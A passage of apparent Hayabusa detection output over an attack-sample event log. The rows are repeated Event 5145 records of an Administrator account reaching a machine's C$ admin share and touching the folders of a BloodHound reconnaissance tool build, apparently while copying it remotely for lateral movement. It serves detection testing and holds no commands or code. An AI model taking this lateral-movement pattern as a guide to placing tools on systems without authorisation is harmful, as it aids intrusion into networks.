Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.628 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.628 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.628 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.628 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.648 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.648 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.648 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.648 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.658 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.658 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.668 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.668 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.668 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.678 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.678 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.678 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.678 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.688 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.688 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.688 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.688 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.698 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.698 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.698 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.698 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.708 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.708 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.708 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.708 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.718 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.718 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.718 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.718 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.728 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.728 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.728 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.738 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.738 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.738 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.738 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.748 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.748 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.748 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.748 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.758 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.758 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.758 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.758 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 